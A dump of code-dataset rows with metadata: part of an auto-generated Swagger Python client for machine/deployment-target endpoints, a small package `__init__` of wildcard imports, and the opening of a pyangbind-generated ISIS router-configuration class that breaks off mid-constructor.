kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The modified DeploymentTargetResource
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The modified DeploymentTargetResource
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The modified DeploymentTargetResource
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The modified DeploymentTargetResource
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
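# Usage sketch for a typical read-modify-write cycle (illustrative; the
# IDs and the `name` attribute are hypothetical; the
# deployment_target_resource keyword is the body parameter accepted by
# the modify methods above):
#
#   target = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(
#       'Spaces-1', 'Machines-42')
#   target.name = 'web-01-renamed'
#   updated = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(
#       'Spaces-1', 'Machines-42', deployment_target_resource=target)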
[row metadata: avg_line_length 49.42825 | max_line_length 271 | alphanum_fraction 0.681103 | remaining unlabeled quality-signal columns omitted]

[next dataset row] hexsha c78ddebab9e0a541b68783c4bc0978f9e9e4660a | size 88 | ext py | lang Python | path waddleadmin/helpers/__init__.py | repo ababic/waddleadmin @ 9994915eac86299e16242ad5acca7ca0e6c78da7 | licenses ["MIT"] | 1 star (2019-04-23) | issue/fork columns null
from .url import * # noqa
from .permission import * # noqa
from .button import * # noqa
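# The three wildcard imports above re-export the package's url, permission
# and button helpers as a single flat `waddleadmin.helpers` namespace; the
# `# noqa` markers suppress lint warnings about the star imports.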
[row metadata: avg_line_length 22 | max_line_length 32 | alphanum_fraction 0.693182 | remaining unlabeled quality-signal columns omitted]

[next dataset row] hexsha c7a8a1dae4386a8dea09a2f2e338a237443647f1 | size 122,714 | ext py | lang Python | path pybind/slxos/v16r_1_00b/isis_state/router_isis_config/__init__.py | repo shivharis/pybind @ 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | licenses ["Apache-2.0"] | 1 fork (2021-11-05) | star/issue columns null
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import isis_system_info
import log_handler
import is_address_family_v4
import is_address_family_v6
import reverse_metric
import debug_handler
import l1_auth_profile
import l2_auth_profile
import l1_spf_timer
import l2_spf_timer
import l1_spf6_timer
import l2_spf6_timer
import pspf_timer
import pspf6_timer
class router_isis_config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-isis-operational - based on the path /isis-state/router-isis-config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: ISIS Global configuration summary
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__nsr_state','__lsp_flood_count','__lsp_fast_flood_count','__fast_flood_wait_count','__hello_padding','__hello_padding_ptp','__csnp_interval','__lsp_gen_interval','__lsp_interval','__lsp_refresh_interval','__lsp_lifetime','__retransmit_interval','__pspf_enabled','__ispf_enabled','__istct_spf_enabled','__overload_state','__overload_startup_time','__overload_wait_on_bgp','__overload_bgp_wait_time','__enable_code_assertions','__graceful_restart_helper','__isis_hostname_enabled','__isis_system_info','__log_handler','__is_address_family_v4','__is_address_family_v6','__reverse_metric','__debug_handler','__l1_auth_profile','__l2_auth_profile','__l1_spf_timer','__l2_spf_timer','__l1_spf6_timer','__l2_spf6_timer','__pspf_timer','__pspf6_timer',)
_yang_name = 'router-isis-config'
_rest_name = 'router-isis-config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
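# NOTE: path_helper is resolved in three steps: an explicit keyword
# argument wins, then a helper inherited from the parent node, then it
# defaults to False (disabled). The extmethods block below follows the
# same pattern.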
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
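# Each leaf/container below is wrapped in YANGDynClass, which binds the
# YANG metadata (type restriction, yang/rest names, namespace, defining
# module) to the underlying Python value so that assignments can be
# validated against the model at runtime.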
self.__ispf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__overload_bgp_wait_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__fast_flood_wait_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__l1_spf6_timer = YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__lsp_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__debug_handler = YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__reverse_metric = YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__overload_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__is_address_family_v6 = YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__l2_spf6_timer = YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__lsp_fast_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__overload_startup_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__csnp_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__istct_spf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__lsp_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__nsr_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__l2_auth_profile = YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__overload_wait_on_bgp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__lsp_gen_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__lsp_refresh_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__lsp_lifetime = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__isis_hostname_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__hello_padding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__isis_system_info = YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__graceful_restart_helper = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__pspf_timer = YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__is_address_family_v4 = YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__enable_code_assertions = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__l1_auth_profile = YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__l2_spf_timer = YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__hello_padding_ptp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
